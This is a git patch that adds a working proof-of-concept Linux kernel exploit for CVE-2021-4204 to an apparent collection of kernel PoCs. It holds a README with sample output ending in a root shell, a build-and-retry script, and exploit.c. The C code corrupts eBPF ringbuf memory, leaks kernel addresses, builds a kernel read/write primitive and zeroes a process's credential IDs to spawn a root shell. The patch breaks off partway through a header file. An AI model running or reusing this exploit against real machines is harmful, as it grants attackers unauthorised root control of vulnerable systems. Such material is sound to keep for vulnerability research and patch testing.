From 66d52d1c13612700872eb748288c87297d21892c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9C=B1=E6=B0=B8=E6=B8=85?=
Date: Wed, 8 Mar 2023 11:37:31 +0000
Subject: [PATCH] Add the core exploit program for CVE-2021-4204
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 朱永清
---
 .../CVE-2021-4204/CVE-2021-4204.yaml          |   18 +
 data/KernelPocs/CVE-2021-4204/README.md       |   48 +
 .../KernelPocs/CVE-2021-4204/build_and_run.sh |   13 +
 data/KernelPocs/CVE-2021-4204/exploit.c       |  517 +++++++
 data/KernelPocs/CVE-2021-4204/include/bpf.h   | 1161 +++++++++++++++++
 .../KernelPocs/CVE-2021-4204/include/config.h |   18 +
 data/KernelPocs/CVE-2021-4204/include/debug.h |  301 +++++
 .../KernelPocs/CVE-2021-4204/include/helper.h |   90 ++
 8 files changed, 2166 insertions(+)
 create mode 100644 data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml
 create mode 100644 data/KernelPocs/CVE-2021-4204/README.md
 create mode 100644 data/KernelPocs/CVE-2021-4204/build_and_run.sh
 create mode 100644 data/KernelPocs/CVE-2021-4204/exploit.c
 create mode 100644 data/KernelPocs/CVE-2021-4204/include/bpf.h
 create mode 100644 data/KernelPocs/CVE-2021-4204/include/config.h
 create mode 100644 data/KernelPocs/CVE-2021-4204/include/debug.h
 create mode 100644 data/KernelPocs/CVE-2021-4204/include/helper.h

diff --git a/data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml b/data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml
new file mode 100644
index 0000000..6c113a7
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/CVE-2021-4204.yaml
@@ -0,0 +1,18 @@
+id: CVE-2021-4204
+source: https://github.com/tr3ee/CVE-2021-4204
+info:
+  name: The Linux kernel is the kernel used by Linux, the U.S. Linux Foundation's open-source operating system.
+  severity: high
+  description: |
+    An out-of-bounds (OOB) memory access flaw was found in the Linux kernel's eBPF due to improper input validation. This flaw allows a local attacker with special privileges to crash the system or leak internal information.
+  scope-of-influence:
+    v5.8 ≤ linux-kernel ≤ v5.16
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-4204
+    - https://www.openwall.com/lists/oss-security/2022/01/11/4
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
+    cvss-score: 7.1
+    cve-id: CVE-2021-4204
+    cwe-id: CWE-787, CWE-20
+  tags: cve2021,privilege-escalation
\ No newline at end of file
diff --git a/data/KernelPocs/CVE-2021-4204/README.md b/data/KernelPocs/CVE-2021-4204/README.md
new file mode 100644
index 0000000..8d0c76b
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/README.md
@@ -0,0 +1,48 @@
+# CVE-2021-4204
+
+Chinese writeup: https://tr3e.ee/posts/cve-2021-4204-linux-kernel-ebpf-lpe.txt
+
+For educational/research purposes only. Use at your own risk.
+
+## Build & Run
+
+```bash
+$ sh build_and_run.sh
+Build from source...
+cc -I include -static -w -o exploit exploit.c
+Start exploit! This might take a while...
+[*] phase(1/7) 'create bpf map(s)' running
+[+] phase(1/7) 'create bpf map(s)' done
+[*] phase(2/7) 'corrupt ringbuf' running
+Killed
+--------------------------------
+[*] phase(1/7) 'create bpf map(s)' running
+[+] phase(1/7) 'create bpf map(s)' done
+[*] phase(2/7) 'corrupt ringbuf' running
+[+] phase(2/7) 'corrupt ringbuf' done
+[*] phase(3/7) 'spawn processes' running
+[+] phase(3/7) 'spawn processes' done
+[*] phase(4/7) 'find cred (slow)' running
+[+] phase(4/7) 'find cred (slow)' done
+[*] phase(5/7) 'overwrite cred' running
+[+] phase(5/7) 'overwrite cred' done
+[*] phase(6/7) 'spawn root shell' running
+[+] Enjoy root!
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# exit
+[+] phase(6/7) 'spawn root shell' done
+[*] phase(7/7) 'clean up the mess' running
+[+] phase(7/7) 'clean up the mess' done
+```
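+
+## Troubleshooting
+
+The exploit needs unprivileged access to the `bpf()` syscall. If every run
+fails in phase 1, check the sysctl below first (on most kernels, 0 means
+unprivileged bpf is allowed):
+
+```bash
+$ sysctl kernel.unprivileged_bpf_disabled
+kernel.unprivileged_bpf_disabled = 0
+```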
diff --git a/data/KernelPocs/CVE-2021-4204/build_and_run.sh b/data/KernelPocs/CVE-2021-4204/build_and_run.sh
new file mode 100644
index 0000000..ea83d21
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/build_and_run.sh
@@ -0,0 +1,13 @@
+#!/bin/sh
+
+cd "$(dirname "$0")"
+
+echo "Build from source..." && cc -I include -static -w -o exploit exploit.c
+
+echo "Start exploit! This might take a while..."
+
+until ./exploit
+do
+    echo "--------------------------------"
+    sleep 1
+done
\ No newline at end of file
diff --git a/data/KernelPocs/CVE-2021-4204/exploit.c b/data/KernelPocs/CVE-2021-4204/exploit.c
new file mode 100644
index 0000000..b8b2588
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/exploit.c
@@ -0,0 +1,517 @@
+#include <signal.h>
+#include <sys/prctl.h>
+#include <sys/wait.h>
+
+#include "bpf.h"
+#include "config.h"
+#include "debug.h"
+#include "helper.h"
+
+typedef struct {
+    u32 rand;
+
+    int comm_fd;
+    int array_fd;
+    int ringbuf_fd;
+    int ringbuf_next_fd;
+
+    int ringbuf_fds[MAP_NUM];
+    pid_t processes[PROC_NUM];
+
+    kaddr_t ringbuf;
+    kaddr_t ringbuf_pages;
+    kaddr_t array_map;
+    kaddr_t array_map_ops;
+    kaddr_t task_struct;
+    kaddr_t cred;
+
+    union {
+        u8 bytes[PAGE_SIZE*8];
+        u16 words[0];
+        u32 dwords[0];
+        u64 qwords[0];
+        kaddr_t ptrs[0];
+    };
+} context_t;
+
+typedef struct {
+    const char* name;
+    int (*func)(context_t *ctx);
+    int ignore_error;
+} phase_t;
+
+int create_bpf_maps(context_t *ctx)
+{
+    int ret = 0;
+
+    ret = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(u32), PAGE_SIZE, 1);
+    if (ret < 0) {
+        WARNF("Failed to create comm map: %d (%s)", ret, strerror(-ret));
+        return ret;
+    }
+    ctx->comm_fd = ret;
+
+    for (int i = 0; i < MAP_NUM; i++)
+    {
+        if ((ret = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, PAGE_SIZE)) < 0) {
+            WARNF("Could not create ringbuf map[%d]: %d (%s)", i, ret, strerror(-ret));
+            return ret;
+        }
+        ctx->ringbuf_fds[i] = ret;
+    }
+
+    ctx->rand = urandom();
+
+    u32 idx = (ctx->rand%(MAP_NUM - 1));
+    ctx->ringbuf_fd = ctx->ringbuf_fds[idx];
+    ctx->ringbuf_next_fd = ctx->ringbuf_fds[idx+1];
+
+    DEBUGF("random = 0x%08x, idx = %d", ctx->rand, idx);
+
+    return 0;
+}
+
+int spawn_processes(context_t *ctx)
+{
+    for (int i = 0; i < PROC_NUM; i++)
+    {
+        pid_t child = fork();
+        if (child == 0) {
+            if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) {
+                WARNF("Could not set name");
+            }
+            uid_t old = getuid();
+            kill(getpid(), SIGSTOP);
+            uid_t uid = getuid();
+            if (uid == 0 && old != uid) {
+                OKF("Enjoy root!");
+                system("/bin/sh");
+            }
+            exit(uid);
+        }
+        if (child < 0) {
+            return child;
+        }
+        ctx->processes[i] = child;
+    }
+
+    return 0;
+}
+
+int corrupt_ringbuf(context_t *ctx)
+{
+    struct bpf_insn insn[] = {
+        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
+        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
+        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
+        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+
+        // if (r0 == NULL) exit(1)
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+        BPF_MOV64_IMM(BPF_REG_0, 1),
+        BPF_EXIT_INSN(),
+
+        // r9 = r0
+        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),
+
+        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0xff0, 0)
+        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
+        BPF_MOV64_IMM(BPF_REG_2, 0xff0),
+        BPF_MOV64_IMM(BPF_REG_3, 0x00),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
+
+        // if (r0 == NULL) exit(2)
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+        BPF_MOV64_IMM(BPF_REG_0, 2),
+        BPF_EXIT_INSN(),
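+
+        // Sketch of the corruption step (relies on this PoC's layout assumption):
+        // submitting the record at a shifted pointer makes the kernel write the
+        // record header out of bounds, on top of this ringbuf's own mask, so the
+        // later oversized reserve can reach the adjacent ringbuf mapped behind it.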
+
+        // === Overwrite ringbuf's mask to 0x80000fff ===
+        // r0 = BPF_FUNC_ringbuf_submit(r0-(0x3008-0x38), BPF_RB_NO_WAKEUP)
+        BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (0x3008-0x38)),
+        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
+        BPF_MOV64_IMM(BPF_REG_2, 1),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit),
+
+        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x4000-8, 0)
+        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
+        BPF_MOV64_IMM(BPF_REG_2, 0x4000-8),
+        BPF_MOV64_IMM(BPF_REG_3, 0x00),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
+
+        // if (r0 == NULL) exit(3)
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+        BPF_MOV64_IMM(BPF_REG_0, 3),
+        BPF_EXIT_INSN(),
+
+        // r6 = (struct ringbuf*)next
+        BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0x2000),
+        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0x30),
+
+        // if ((struct ringbuf*)(next)->mask != 0xfff) exit(4);
+        BPF_MOV64_IMM(BPF_REG_8, 0xfff),
+        BPF_JMP_REG(BPF_JEQ, BPF_REG_7, BPF_REG_8, 6),
+        // cleanup on error
+        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000),
+        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
+        BPF_MOV64_IMM(BPF_REG_2, 1),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
+        BPF_MOV64_IMM(BPF_REG_0, 4),
+        BPF_EXIT_INSN(),
+
+        // We are lucky, do some leak and overwrite next->mask
+        BPF_ST_MEM(BPF_W, BPF_REG_6, 0x30, 0xFFFFFFFE),
+        BPF_ST_MEM(BPF_W, BPF_REG_6, 0x34, 0xFFFFFFFF),
+
+        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x8),   // ringbuf addr
+        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 8),
+        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x38),  // ringbuf pages
+        BPF_STX_MEM(BPF_DW, BPF_REG_9, BPF_REG_1, 16),
+        BPF_ST_MEM(BPF_DW, BPF_REG_9, 0x0, 0x13371337),
+
+        // Clean up
+
+        // r0 = bpf_ringbuf_discard(r6-0x2000, BPF_RB_NO_WAKEUP)
+        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0x2000),
+        BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
+        BPF_MOV64_IMM(BPF_REG_2, 1),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
+
+        BPF_MOV64_IMM(BPF_REG_0, 0),
+        BPF_EXIT_INSN()
+    };
+
+    int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, sizeof(insn) / sizeof(insn[0]), "");
+    if (prog < 0) {
+        WARNF("Could not load program(corrupt_ringbuf):\n %s", bpf_log_buf);
+        goto abort;
+    }
+
+    int err = bpf_prog_skb_run(prog, "TRIGGER", 8);
+    if (err != 0) {
+        WARNF("Could not run program(corrupt_ringbuf): %d (%s)", err, strerror(err));
+        goto abort;
+    }
+
+    int key = 0;
+    err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);
+    if (err != 0) {
+        WARNF("Could not lookup comm map: %d (%s)", err, strerror(err));
+        goto abort;
+    }
+
+    if (ctx->qwords[0] != 0x13371337) {
+        WARNF("Could not leak kernel address. Try again if the kernel is vulnerable");
+        goto abort;
+    }
+
+    ctx->ringbuf = ctx->ptrs[1] - 8;
+    ctx->ringbuf_pages = ctx->ptrs[2];
+
+    DEBUGF("ringbuf @ %p", ctx->ringbuf);
+    DEBUGF("ringbuf pages @ %p", ctx->ringbuf_pages);
+
+    return 0;
+
+abort:
+    if (prog > 0) close(prog);
+    return -1;
+}
+
+// restricted_rw reads (mode >= 0) or writes (mode < 0) data at kaddr, with side effects (*kaddr = 0, *(kaddr-8) = bad_value).
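+// Usage sketch (illustrative, not from the original source): find_cred() reads
+// with mode = 1 and overwrite_cred() writes with mode = -1, roughly:
+//
+//     u64 val;
+//     restricted_rw(ctx, kaddr, &val, BPF_DW, 1, 1);   // read 8 bytes at kaddr
+//     u32 zero = 0;
+//     restricted_rw(ctx, kaddr, &zero, BPF_W, 1, -1);  // write 4 bytes at kaddr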
+int restricted_rw(context_t *ctx, kaddr_t kaddr, void* buf, u8 bpf_size, size_t count, int mode)
+{
+    int size = 0;
+    switch (bpf_size)
+    {
+    case BPF_DW:
+        size = 8;
+        break;
+    case BPF_W:
+        size = 4;
+        break;
+    case BPF_H:
+        size = 2;
+        break;
+    case BPF_B:
+        size = 1;
+        break;
+    default:
+        return -1;
+    }
+
+    int ret = -1;
+
+    u64 delta = ctx->ringbuf_pages + 0x30 - (ctx->ringbuf + 0x3000 + 8);
+    u64 offset = kaddr - (ctx->ringbuf_pages + 0x30);
+    u64 tmp[PAGE_SIZE] = {};
+
+    // DEBUGF("restricted_rw %s %p by %p + %p (delta %p)", mode>=0 ? "read":"write", (void*)kaddr, (void*)ctx->ringbuf_pages + 0x30, (void*)offset, (void*)delta);
+
+    struct bpf_insn prefix[] = {
+        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
+        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
+        BPF_ST_MEM(BPF_W, BPF_REG_10, -4, 0),
+        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
+
+        // if (r0 == NULL) exit(1)
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+        BPF_MOV64_IMM(BPF_REG_0, 1),
+        BPF_EXIT_INSN(),
+
+        // r9 = r0
+        BPF_MOV64_REG(BPF_REG_9, BPF_REG_0),
+
+        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, 0x5000-8, 0)
+        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
+        BPF_MOV64_IMM(BPF_REG_2, 0x5000-8),
+        BPF_MOV64_IMM(BPF_REG_3, 0x00),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
+
+        // if (r0 == NULL) exit(2)
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+        BPF_MOV64_IMM(BPF_REG_0, 2),
+        BPF_EXIT_INSN(),
+
+        // r8 = delta
+        BPF_MOV32_IMM(BPF_REG_8, (u32)(delta>>32)),
+        BPF_MOV32_IMM(BPF_REG_2, (u32)(delta&0xFFFFFFFF)),
+        BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),
+        BPF_ALU64_REG(BPF_OR, BPF_REG_8, BPF_REG_2),
+
+        // next->producer_pos = delta
+        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0x4000),
+
+        // r0 = bpf_ringbuf_discard(r0, BPF_RB_NO_WAKEUP)
+        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
+        BPF_MOV64_IMM(BPF_REG_2, 1),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
+
+        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_next_fd, offset+PAGE_SIZE, 0), pointing at ctx->ringbuf_pages + 0x30
+        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_next_fd),
+        BPF_MOV64_IMM(BPF_REG_2, offset+PAGE_SIZE),
+        BPF_MOV64_IMM(BPF_REG_3, 0x00),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),
+
+        // if (r0 == NULL) exit(3)
+        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+        BPF_MOV64_IMM(BPF_REG_0, 3),
+        BPF_EXIT_INSN(),
+
+        // *r0 = 0x80000000
+        BPF_MOV64_IMM(BPF_REG_1, 1),
+        BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 31),
+        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),
+
+        // r0 += offset
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, (u32)(offset)),
+    };
+
+    struct bpf_insn suffix[] = {
+        // r0 points at kaddr; fix that up before the submit
+        BPF_ALU64_IMM(BPF_SUB, BPF_REG_0, (u32)(offset)),
+        BPF_ALU64_IMM(BPF_ADD, BPF_REG_0, 8),
+        // r0 = bpf_ringbuf_submit(r0, BPF_RB_NO_WAKEUP)
+        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
+        BPF_MOV64_IMM(BPF_REG_2, 1),
+        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_submit),
+
+        BPF_MOV64_IMM(BPF_REG_0, 0),
+        BPF_EXIT_INSN(),
+    };
+
+    int prefix_cnt = sizeof(prefix)/sizeof(prefix[0]);
+    int suffix_cnt = sizeof(suffix)/sizeof(suffix[0]);
+
+    struct bpf_insn* insn = calloc(sizeof(struct bpf_insn), prefix_cnt + suffix_cnt + count*2);
+    if (!insn) {
+        WARNF("Failed to allocate insn buffer: out of memory");
+        return -1;
+    }
+
+    struct bpf_insn* p = insn;
+
+    memcpy(p, prefix, sizeof(prefix));
+
+    p += prefix_cnt;
+
+    u8 src = mode >= 0? BPF_REG_0 : BPF_REG_9;
+    u8 dst = mode >= 0?
BPF_REG_9 : BPF_REG_0; + for (int i = 0; i < count; i++) { + *p++ = BPF_LDX_MEM(bpf_size, BPF_REG_1, src, i*size); + *p++ = BPF_STX_MEM(bpf_size, dst, BPF_REG_1, i*size); + } + + memcpy(p, suffix, sizeof(suffix)); + + int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, prefix_cnt + suffix_cnt + count*2, ""); + if (prog < 0) { + WARNF("Failed to load program(read):\n %s", bpf_log_buf); + goto abort; + } + + int err = 0; + + if (mode < 0) { + memcpy(tmp, buf, size*count); + err = bpf_update_elem(ctx->comm_fd, &err, tmp, 0); + if (err != 0) { + WARNF("Failed to update comm map: %d (%s)", err, strerror(err)); + goto abort; + } + } + + if ((err = bpf_prog_skb_run(prog, "tr3e of SecCoder Security Lab", 30)) != 0) { + WARNF("Failed to run program(read): %d (%s)", err, strerror(err)); + goto abort; + } + + if (mode > 0) { + err = bpf_lookup_elem(ctx->comm_fd, &err, tmp); + if (err != 0) { + WARNF("Failed to lookup comm map: %d (%s)", err, strerror(err)); + goto abort; + } + memcpy(buf, tmp, size*count); + } + + ret = 0; + +abort: + if (prog > 0) close(prog); + return ret; +} + +int find_cred(context_t *ctx) +{ + kaddr_t kaddr = ctx->ringbuf_pages + 0x30; + + for (int i = 0; i < 2*PAGE_SIZE; i++) + { + if (restricted_rw(ctx, kaddr, ctx->bytes, BPF_DW, PAGE_SIZE/8, 1) != 0) { + WARNF("Could not find task_struct from kernel vmalloc memory"); + goto abort; + } + u8 *tmp = ctx->bytes; + size_t size = PAGE_SIZE; + while(true) { + int offset = memoff(tmp, size, __ID__, sizeof(__ID__)); + if (offset < 0) break; + kaddr_t creds[2] = {}; + kaddr_t cred_from_task = kaddr + offset - 0x10; + if (restricted_rw(ctx, cred_from_task, creds, BPF_DW, 2, 1) != 0) { + WARNF("Could not read kernel address %p", cred_from_task); + break; + } + // could be cred or cached_requested_key + kaddr_t cred = creds[1] != NULL ? 
creds[1] : creds[0];
+            DEBUGF("Found a candidate task %p, cred %p", cred_from_task, cred);
+            if (cred != 0 && cred > ctx->ringbuf_pages && cred < ctx->ringbuf_pages + (1<<29)) {
+                ctx->cred = cred;
+                DEBUGF("task struct ~ %p", cred_from_task);
+                DEBUGF("cred @ %p", ctx->cred);
+                return 0;
+            }
+            tmp += offset + sizeof(__ID__);
+            size -= offset + sizeof(__ID__);
+        }
+        kaddr += PAGE_SIZE;
+    }
+
+abort:
+    return -1;
+}
+
+int overwrite_cred(context_t *ctx)
+{
+    u64 zero = 0;
+    if (restricted_rw(ctx, ctx->cred + OFFSET_uid_from_cred, &zero, BPF_W, 1, -1) != 0) {
+        return -1;
+    }
+    if (restricted_rw(ctx, ctx->cred + OFFSET_gid_from_cred, &zero, BPF_W, 1, -1) != 0) {
+        return -1;
+    }
+    if (restricted_rw(ctx, ctx->cred + OFFSET_euid_from_cred, &zero, BPF_W, 1, -1) != 0) {
+        return -1;
+    }
+    if (restricted_rw(ctx, ctx->cred + OFFSET_egid_from_cred, &zero, BPF_W, 1, -1) != 0) {
+        return -1;
+    }
+
+    return 0;
+}
+
+int spawn_root_shell(context_t *ctx)
+{
+    for (int i = 0; i < PROC_NUM; i++)
+    {
+        kill(ctx->processes[i], SIGCONT);
+    }
+    while(wait(NULL) > 0);
+    return 0;
+}
+
+int clean_up(context_t *ctx)
+{
+    close(ctx->comm_fd);
+    for (int i = 0; i < MAP_NUM; i++)
+    {
+        if (ctx->ringbuf_fds[i]) close(ctx->ringbuf_fds[i]);
+    }
+    kill(0, SIGCONT);
+    return 0;
+}
+
+phase_t phases[] = {
+    { .name = "create bpf map(s)", .func = create_bpf_maps },
+    { .name = "corrupt ringbuf", .func = corrupt_ringbuf },
+    { .name = "spawn processes", .func = spawn_processes },
+    { .name = "find cred (slow)", .func = find_cred },
+    { .name = "overwrite cred", .func = overwrite_cred },
+    { .name = "spawn root shell", .func = spawn_root_shell },
+    { .name = "clean up the mess", .func = clean_up , .ignore_error = 1 },
+};
+
+int main(int argc, char** argv)
+{
+    context_t ctx = {};
+    int err = 0;
+    int max = sizeof(phases) / sizeof(phases[0]);
+    if (getuid() == 0) {
+        BADF("You are already root, exiting...");
+        return -1;
+    }
+    for (int i = 1; i <= max; i++)
+    {
+        phase_t *phase = &phases[i-1];
+        if (err != 0 && !phase->ignore_error) {
+            ACTF("phase(%d/%d) '%s' skipped", i, max, phase->name);
+            continue;
+        }
+        ACTF("phase(%d/%d) '%s' running", i, max, phase->name);
+        int error = phase->func(&ctx);
+        if (error != 0) {
+            BADF("phase(%d/%d) '%s' returned with error %d", i, max, phase->name, error);
+            err = error;
+        } else {
+            OKF("phase(%d/%d) '%s' done", i, max, phase->name);
+        }
+    }
+    return err;
+}
\ No newline at end of file
diff --git a/data/KernelPocs/CVE-2021-4204/include/bpf.h b/data/KernelPocs/CVE-2021-4204/include/bpf.h
new file mode 100644
index 0000000..b11bda1
--- /dev/null
+++ b/data/KernelPocs/CVE-2021-4204/include/bpf.h
@@ -0,0 +1,1161 @@
+#ifndef _BPF_H_
+#define _BPF_H_
+
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <linux/types.h>
+
+/* Instruction classes */
+#define BPF_CLASS(code) ((code) & 0x07)
+#define BPF_LD 0x00
+#define BPF_LDX 0x01
+#define BPF_ST 0x02
+#define BPF_STX 0x03
+#define BPF_ALU 0x04
+#define BPF_JMP 0x05
+#define BPF_RET 0x06
+#define BPF_MISC 0x07
+
+/* ld/ldx fields */
+#define BPF_SIZE(code) ((code) & 0x18)
+#define BPF_W 0x00 /* 32-bit */
+#define BPF_H 0x08 /* 16-bit */
+#define BPF_B 0x10 /* 8-bit */
+#define BPF_DW 0x18 /* 64-bit */
+#define BPF_MODE(code) ((code) & 0xe0)
+#define BPF_IMM 0x00
+#define BPF_ABS 0x20
+#define BPF_IND 0x40
+#define BPF_MEM 0x60
+#define BPF_LEN 0x80
+#define BPF_MSH 0xa0
+
+/* alu/jmp fields */
+#define BPF_OP(code) ((code) & 0xf0)
+#define BPF_ADD 0x00
+#define BPF_SUB 0x10
+#define BPF_MUL 0x20
+#define BPF_DIV 0x30
+#define
BPF_OR 0x40 +#define BPF_AND 0x50 +#define BPF_LSH 0x60 +#define BPF_RSH 0x70 +#define BPF_NEG 0x80 +#define BPF_MOD 0x90 +#define BPF_XOR 0xa0 + +#define BPF_JA 0x00 +#define BPF_JEQ 0x10 +#define BPF_JGT 0x20 +#define BPF_JGE 0x30 +#define BPF_JSET 0x40 +#define BPF_SRC(code) ((code) & 0x08) +#define BPF_K 0x00 +#define BPF_X 0x08 + +/* Extended instruction set based on top of classic BPF */ + +/* instruction classes */ +#define BPF_JMP32 0x06 /* jmp mode in word width */ +#define BPF_ALU64 0x07 /* alu mode in double word width */ + +/* ld/ldx fields */ +#define BPF_DW 0x18 /* double word (64-bit) */ +#define BPF_ATOMIC 0xc0 /* atomic memory ops - op type in immediate */ +#define BPF_XADD 0xc0 /* exclusive add - legacy name */ + +/* alu/jmp fields */ +#define BPF_MOV 0xb0 /* mov reg to reg */ +#define BPF_ARSH 0xc0 /* sign extending arithmetic shift right */ + +/* change endianness of a register */ +#define BPF_END 0xd0 /* flags for endianness conversion: */ +#define BPF_TO_LE 0x00 /* convert to little-endian */ +#define BPF_TO_BE 0x08 /* convert to big-endian */ +#define BPF_FROM_LE BPF_TO_LE +#define BPF_FROM_BE BPF_TO_BE + +/* jmp encodings */ +#define BPF_JNE 0x50 /* jump != */ +#define BPF_JLT 0xa0 /* LT is unsigned, '<' */ +#define BPF_JLE 0xb0 /* LE is unsigned, '<=' */ +#define BPF_JSGT 0x60 /* SGT is signed '>', GT in x86 */ +#define BPF_JSGE 0x70 /* SGE is signed '>=', GE in x86 */ +#define BPF_JSLT 0xc0 /* SLT is signed, '<' */ +#define BPF_JSLE 0xd0 /* SLE is signed, '<=' */ +#define BPF_CALL 0x80 /* function call */ +#define BPF_EXIT 0x90 /* function return */ + +/* atomic op type fields (stored in immediate) */ +#define BPF_FETCH 0x01 /* not an opcode on its own, used to build others */ +#define BPF_XCHG (0xe0 | BPF_FETCH) /* atomic exchange */ +#define BPF_CMPXCHG (0xf0 | BPF_FETCH) /* atomic compare-and-write */ + +/* When BPF ldimm64's insn[0].src_reg != 0 then this can have + * the following extensions: + * + * insn[0].src_reg: BPF_PSEUDO_MAP_FD + * insn[0].imm: map fd + * insn[1].imm: 0 + * insn[0].off: 0 + * insn[1].off: 0 + * ldimm64 rewrite: address of map + * verifier type: CONST_PTR_TO_MAP + */ +#define BPF_PSEUDO_MAP_FD 1 +/* insn[0].src_reg: BPF_PSEUDO_MAP_VALUE + * insn[0].imm: map fd + * insn[1].imm: offset into value + * insn[0].off: 0 + * insn[1].off: 0 + * ldimm64 rewrite: address of map[0]+offset + * verifier type: PTR_TO_MAP_VALUE + */ +#define BPF_PSEUDO_MAP_VALUE 2 +/* insn[0].src_reg: BPF_PSEUDO_BTF_ID + * insn[0].imm: kernel btd id of VAR + * insn[1].imm: 0 + * insn[0].off: 0 + * insn[1].off: 0 + * ldimm64 rewrite: address of the kernel variable + * verifier type: PTR_TO_BTF_ID or PTR_TO_MEM, depending on whether the var + * is struct/union. + */ +#define BPF_PSEUDO_BTF_ID 3 + +/* when bpf_call->src_reg == BPF_PSEUDO_CALL, bpf_call->imm == pc-relative + * offset to another bpf function + */ +#define BPF_PSEUDO_CALL 1 + +/* Register numbers */ +enum { + BPF_REG_0 = 0, + BPF_REG_1, + BPF_REG_2, + BPF_REG_3, + BPF_REG_4, + BPF_REG_5, + BPF_REG_6, + BPF_REG_7, + BPF_REG_8, + BPF_REG_9, + BPF_REG_10, + __MAX_BPF_REG, +}; + +/* BPF has 10 general purpose 64-bit registers and stack frame. 
